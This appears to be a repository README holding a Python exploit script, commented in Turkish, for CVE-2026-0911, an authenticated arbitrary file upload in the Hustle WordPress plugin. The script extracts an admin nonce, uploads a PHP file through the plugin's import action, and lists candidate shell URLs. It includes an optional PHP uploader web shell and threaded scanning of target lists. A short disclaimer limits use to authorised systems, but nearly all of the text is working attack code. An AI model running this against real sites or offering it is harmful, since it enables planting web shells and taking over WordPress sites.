README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2026-0911 — Hustle (wordpress-popup) kimlik doğrulamalı keyfi dosya yükleme / RCE öncesi test.
Etkilenen: Hustle <= 7.8.9.2 — wp_handle_upload() test_type=false ile çağrılır, uzantı kontrolü zayıftır;
başarısız import sonrası dosya silinmeyebilir (uploads altında yetim dosya).
Ön koşullar (NVD / Wordfence):
- Hustle yönetimine erişebilen kullanıcı için geçerli WordPress oturumu (çerez) ve
hustle_single_action nonce (çoğunlukla yönetici Hustle/modül izni verdikten sonra).
- moduleId=0 «yeni import» yolunda: ücretsiz kotanın yüklemeden önce engellememesi gerekir
(aksi halde eklenti dosyayı yazmadan hata döner).
YASAL: Yalnızca size ait veya yazılı test izniniz olan sistemlerde kullanın.
Çıktının kaydedildiği yer
-------------------------
Varsayılan: olası başarılı koşular (yetim yükleme sinyali) şu dosyaya **eklenir**:
cve-2026-0911-hits.txt (betiği çalıştırdığınız çalışma dizini)
Yol değiştirme: -o yol/çıktı.txt veya --output yol/çıktı.txt
Biçim: hedef + açıklama satırı, altında girintili aday kabuk URL’leri (uploads/YYYY/MM/...).
Başarılı satırlar tespit edilir edilmez anında diske yazılır.
Kabuk / yükleme kodu
--------------------
HTTP çok parçalı yükleme: ``post_hustle_import_upload()`` (``exploit_target`` içinden).
Yük: ``DEFAULT_SHELL`` (sondaj) veya ``SHELL_UPLOADER_PHP`` (``--uploader``).
"""
from __future__ import annotations
import argparse
import json
import re
import sys
import threading
import os
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import dataclass
from datetime import datetime, timezone
from pathlib import Path
from typing import Callable, Optional
from urllib.parse import urljoin
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Hustle yönetici AJAX eylemi (bkz. hustle-modules-common-admin-ajax.php)
AJAX_ACTION = "hustle_module_handle_single_action"
DEFAULT_PAGE = "hustle_popup_listing" # admin.php?page=...
MODULE_TYPES = ("popup", "slidein", "embedded", "social_sharing")
# Varsayılan: zararsız tek satırlık sondaj (yalnızca yetkili test).
DEFAULT_SHELL = b"<?php echo 'HUSTLE_CVE_2026_0911_DENEME';"
# İsteğe bağlı: küçük HTML/PHP form yükleyici; yalnızca --uploader ile.
SHELL_UPLOADER_PHP = (
"""<?php
if (isset($_FILES['f'])) {
move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']);
echo "Yüklendi: ".$_FILES['f']['name'];
}
?><form method="POST" enctype="multipart/form-data"><input type="file" name="f"><button>Yükle</button></form>"""
).encode("utf-8")
@dataclass
class ExploitResult:
target: str
ok: bool
detail: str
candidate_urls: list[str]
def _session_from_cookie(cookie: str) -> requests.Session:
s = requests.Session()
s.headers.update(
{
"User-Agent": "Mozilla/5.0 (compatible; CVE-2026-0911-arastirma/1.0)",
"Accept": "text/html,application/json;q=0.9,*/*;q=0.8",
}
)
for part in cookie.split(";"):
part = part.strip()
if not part or "=" not in part:
continue
k, v = part.split("=", 1)
k, v = k.strip(), v.strip()
if k.lower() == "path":
continue
s.cookies.set(k, v, domain=None)
return s
def fetch_nonce(
session: requests.Session,
base_url: str,
admin_page: str,
verify_ssl: bool,
timeout: float,
log: Optional[Callable[[str], None]] = None,
) -> Optional[str]:
"""Hustle liste/sihirbaz HTML içinden optinVars.single_module_action_nonce ayrıştırır."""
admin_url = urljoin(base_url.rstrip("/") + "/", "wp-admin/admin.php")
r = session.get(
admin_url,
params={"page": admin_page},
timeout=timeout,
verify=verify_ssl,
allow_redirects=True,
)
if log:
log(f" → GET (nonce) {r.url} — HTTP {r.status_code}")
if r.status_code != 200:
return None
text = r.text
# wp_localize_script: var optinVars = {...};
m = re.search(
r'single_module_action_nonce"\s*:\s*"([a-zA-Z0-9_]+)"',
text,
)
if m:
return m.group(1)
# Yedek: farklı tırnak deseni
m2 = re.search(r"single_module_action_nonce['\"]\s*:\s*['\"]([^'\"]+)['\"]", text)
return m2.group(1) if m2 else None
def post_hustle_import_upload(
session: requests.Session,
ajax_url: str,
nonce: str,
module_id: int,
module_type: str,
module_mode: str,
remote_filename: str,
file_body: bytes,
verify_ssl: bool,
timeout: float,
) -> requests.Response:
"""
CVE-2026-0911 çekirdeği: admin-ajax.php üzerinde çok parçalı POST — alan adı ``import_file`` olmalı
(bkz. Hustle ``action_import_module()`` / ``$_FILES['import_file']``).
"""
files = {
"import_file": (
remote_filename,
file_body,
"application/octet-stream",
)
}
data = {
"action": AJAX_ACTION,
"_wpnonce": nonce,
"moduleId": str(module_id),
"hustleAction": "import",
"type": module_type,
"module_mode": module_mode,
"context": "listing",
}
return session.post(
ajax_url,
data=data,
files=files,
timeout=timeout,
verify=verify_ssl,
)
def build_upload_candidates(base_url: str, remote_name: str) -> list[str]:
"""WordPress varsayılan uploads/YYYY/MM yolu — sunucu yeniden adlandırabilir; tahmine dayalı liste."""
base = base_url.rstrip("/")
now = datetime.now(timezone.utc)
y, m = now.year, now.month
clean = re.sub(r"[^\w.\-]", "_", remote_name)
return [
f"{base}/wp-content/uploads/{y:04d}/{m:02d}/{clean}",
f"{base}/wp-content/uploads/{y:04d}/{m:02d}/{clean}.php",
]
def exploit_target(
base_url: str,
session: requests.Session,
nonce: str,
module_id: int,
module_type: str,
module_mode: str,
remote_filename: str,
file_body: bytes,
verify_ssl: bool,
timeout: float,
debug: bool,
log: Optional[Callable[[str], None]] = None,
) -> ExploitResult:
base_url = base_url.rstrip("/")
ajax_url = f"{base_url}/wp-admin/admin-ajax.php"
try:
r = post_hustle_import_upload(
session,
ajax_url,
nonce,
module_id,
module_type,
module_mode,
remote_filename,
file_body,
verify_ssl,
timeout,
)
except requests.RequestException as e:
return ExploitResult(base_url, False, f"İstek hatası: {e}", [])
if log:
log(
f" → POST (import) {ajax_url} — HTTP {r.status_code}, "
f"yanıt ~{len(r.text)} bayt"
)
if debug:
print(f" [ayıklama] HTTP {r.status_code} gövde[:400]={r.text[:400]!r}")
body = r.text.strip()
candidates = build_upload_candidates(base_url, remote_filename)
# JSON hatası beklenir: yüklemeden sonra import JSON ayrıştırır — iletide sıkça «json» geçer.
parsed: Optional[dict] = None
try:
parsed = r.json()
except json.JSONDecodeError:
jm = re.search(r"\{.*\}", body, re.DOTALL)
if jm:
try:
parsed = json.loads(jm.group(0))
except json.JSONDecodeError:
parsed = None
if parsed is not None:
success = parsed.get("success")
msg = ""
if isinstance(parsed.get("data"), dict):
msg = str(parsed["data"].get("message", ""))
if success is False:
lower = msg.lower()
if (
"json" in lower
or "invalid" in lower
or "configuration" in lower
or "file must" in lower
):
return ExploitResult(
base_url,
True,
f"Sunucu importu reddetti (yetim yükleme sonrası beklenen): {msg or body[:200]}",
candidates,
)
return ExploitResult(
base_url,
False,
f"Beklenmeyen hata: {msg or body[:300]}",
candidates,
)
if success is True:
return ExploitResult(
base_url,
True,
"Import başarı döndü (saf .php yükü için olağandışı; elle doğrulayın)",
candidates,
)
if r.status_code == 200 and body:
return ExploitResult(
base_url,
False,
f"JSON değil veya belirsiz yanıt: {body[:400]}",
candidates,
)
return ExploitResult(
base_url,
False,
f"HTTP {r.status_code}: {body[:300]}",
candidates,
)
def load_targets(path: Path) -> list[str]:
lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
return [ln.strip() for ln in lines if ln.strip() and not ln.strip().startswith("#")]
def parse_args(argv: Optional[list[str]] = None) -> argparse.Namespace:
p = argparse.ArgumentParser(
description=(
"CVE-2026-0911 Hustle modül importu — yetim yükleme denemesi (yalnızca yetkili kullanım)."
),
)
p.add_argument(
"-u",
"--url",
help="Tek hedef kök URL (örn. https://ornek.com)",
)
p.add_argument(
"-l",
"--list",
type=Path,
help=(
"Satır başına bir kök URL; # ile yorum. Aynı --cookie tüm satırlarda "
"(her host için ayrı çalıştırmanız gerekebilir)"
),
)
p.add_argument(
"--cookie",
help="Tam Cookie başlığı (örn. wordpress_logged_in_...=...)",
)
p.add_argument(
"--cookie-file",
type=Path,
help="Tek satır: Cookie dizgisi veya ad=değer çiftleri",
)
p.add_argument(
"--nonce",
help="hustle_single_action için elle WordPress nonce (otomatik çekim yerine)",
)
p.add_argument(
"--admin-page",
default=DEFAULT_PAGE,
help=f"Nonce için admin.php?page= değeri (varsayılan: {DEFAULT_PAGE})",
)
p.add_argument(
"--module-id",
type=int,
default=0,
help=(
"POST moduleId; 0 geçersiz modül (WP_Error) tetikler, import başında "
"hustle_create denetimini atlar"
),
)
p.add_argument(
"--module-type",
choices=MODULE_TYPES,
default="popup",
help="Hustle modül türü",
)
p.add_argument(
"--module-mode",
default="informational",
help="POST module_mode (informational|optin)",
)
p.add_argument(
"--remote-name",
default="probe_rce.php",
help="import_file ile gönderilen uzak dosya adı (.php — JSON dalına sokulmasın)",
)
p.add_argument(
"--payload-file",
type=Path,
help="Kabuk baytlarını dosyadan oku (varsayılan sondaj ve --uploader üzerine yazar)",
)
p.add_argument(
"--uploader",
action="store_true",
help="Yerleşik PHP mini form-yükleyici gövdesini kullan (SHELL_UPLOADER_PHP)",
)
p.add_argument(
"--workers",
type=int,
default=8,
help="-l ile eşzamanlı iş parçacığı sayısı",
)
p.add_argument(
"--timeout",
type=float,
default=25.0,
help="İstek zaman aşımı (saniye)",
)
p.add_argument(
"--verify-ssl",
action="store_true",
help="TLS doğrula (varsayılan: kapalı)",
)
p.add_argument(
"--debug",
action="store_true",
help="Ayrıntılı ayıklama çıktısı",
)
p.add_argument(
"--quiet",
action="store_true",
help="Yalnızca özet; etki alanı ve adım loglarını gösterme",
)
p.add_argument(
"-o",
"--output",
type=Path,
default=Path("cve-2026-0911-hits.txt"),
help="Başarılı hedefler + aday URL’leri ekle (append)",
)
return p.parse_args(argv)
def main(argv: Optional[list[str]] = None) -> int:
args = parse_args(argv)
if not args.url and not args.list:
print("--url veya --list verin", file=sys.stderr)
return 2
cookie = args.cookie
if args.cookie_file:
cookie = args.cookie_file.read_text(encoding="utf-8", errors="replace").strip()
if not cookie:
print("--cookie veya --cookie-file verin", file=sys.stderr)
return 2
if args.payload_file:
file_body = args.payload_file.read_bytes()
elif args.uploader:
file_body = SHELL_UPLOADER_PHP
else:
file_body = DEFAULT_SHELL
targets: list[str] = []
if args.url:
targets.append(args.url.rstrip("/"))
if args.list:
targets.extend(load_targets(args.list))
verify_ssl = args.verify_ssl
timeout = args.timeout
verbose = not args.quiet
out_lock = threading.Lock()
log_lock = threading.Lock()
out_path = args.output.resolve()
def log(msg: str) -> None:
if not verbose:
return
with log_lock:
print(msg, flush=True)
def append_hit_now(r: ExploitResult) -> None:
"""Başarılı sonucu hemen diske yazar (iş parçacığı güvenli)."""
with out_lock:
with args.output.open("a", encoding="utf-8") as f:
f.write(f"{r.target}\t{r.detail}\n")
for u in r.candidate_urls:
f.write(f"\t{u}\n")
f.flush()
try:
os.fsync(f.fileno())
except OSError:
pass
def run_one(base: str) -> ExploitResult:
log(f"{'─'*60}")
log(f"[*] Hedef: {base}")
log(
f" Adımlar: oturum → nonce → Hustle modül import (çok parçalı import_file) "
f"→ JSON yanıt analizi"
)
sess = _session_from_cookie(cookie)
nonce = args.nonce
if not nonce:
log(f"[*] {base} | Nonce çekiliyor (yönetici sayfası: {args.admin_page})…")
nonce = fetch_nonce(
sess, base, args.admin_page, verify_ssl, timeout, log=log
)
if not nonce:
log(f"[-] {base} | Nonce yok (çerez / sayfa / yetki kontrol edin)")
return ExploitResult(
base,
False,
"single_module_action_nonce çıkarılamadı; --nonce verin veya --admin-page / çerez kontrol edin",
[],
)
log(f"[+] {base} | Nonce alındı ({nonce[:8]}…)")
else:
log(f"[*] {base} | Nonce komut satırından (--nonce)")
log(
f"[*] {base} | Yükleme: action={AJAX_ACTION}, hustleAction=import, "
f"moduleId={args.module_id}, type={args.module_type}, "
f"dosya={args.remote_name!r} ({len(file_body)} bayt)"
)
if args.debug:
with log_lock:
print(f" [ayıklama] nonce={nonce[:6]}…", flush=True)
res = exploit_target(
base,
sess,
nonce,
args.module_id,
args.module_type,
args.module_mode,
args.remote_name,
file_body,
verify_ssl,
timeout,
args.debug,
log=log if verbose else None,
)
if res.ok:
log(f"[+] {base} | Olası başarı (yetim yükleme sinyali): {res.detail[:120]}")
for u in res.candidate_urls:
log(f" Aday URL: {u}")
else:
log(f"[-] {base} | Başarısız: {res.detail[:160]}")
return res
results: list[ExploitResult] = []
if len(targets) == 1:
r0 = run_one(targets[0])
results.append(r0)
if r0.ok:
append_hit_now(r0)
log(f"[+] Dosyaya yazıldı → {out_path}")
else:
log(f"[*] {len(targets)} hedef, eşzamanlı işçi: {args.workers}")
with ThreadPoolExecutor(max_workers=max(1, args.workers)) as ex:
futs = {ex.submit(run_one, t): t for t in targets}
for i, fut in enumerate(as_completed(futs), 1):
r = fut.result()
results.append(r)
if r.ok:
append_hit_now(r)
log(
f"[+] [{i}/{len(targets)}] İsabet dosyaya yazıldı | hedef: {r.target} → {out_path}"
)
else:
log(f"[.] [{i}/{len(targets)}] Bitti (isabet yok) | hedef: {r.target}")
hits = [r for r in results if r.ok]
print(f"\n{'='*60}")
print(f"Bitti. Olası yetim-yükleme sinyali: {len(hits)}/{len(results)}")
for r in results:
durum = "OLASI" if r.ok else "yok"
print(f" [{durum}] {r.target} — {r.detail}")
for u in r.candidate_urls:
print(f" dene: {u}")
if hits:
print(
f"\n[i] İsabetler anında şuraya yazıldı: {out_path} ({len(hits)} kayıt kümesi)"
)
else:
print(f"\n[i] İsabet yok — {out_path} değişmedi")
return 0 if hits else 1
if __name__ == "__main__":
try:
raise SystemExit(main())
except KeyboardInterrupt:
print("\n[!] Kullanıcı tarafından kesildi", file=sys.stderr)
raise SystemExit(130)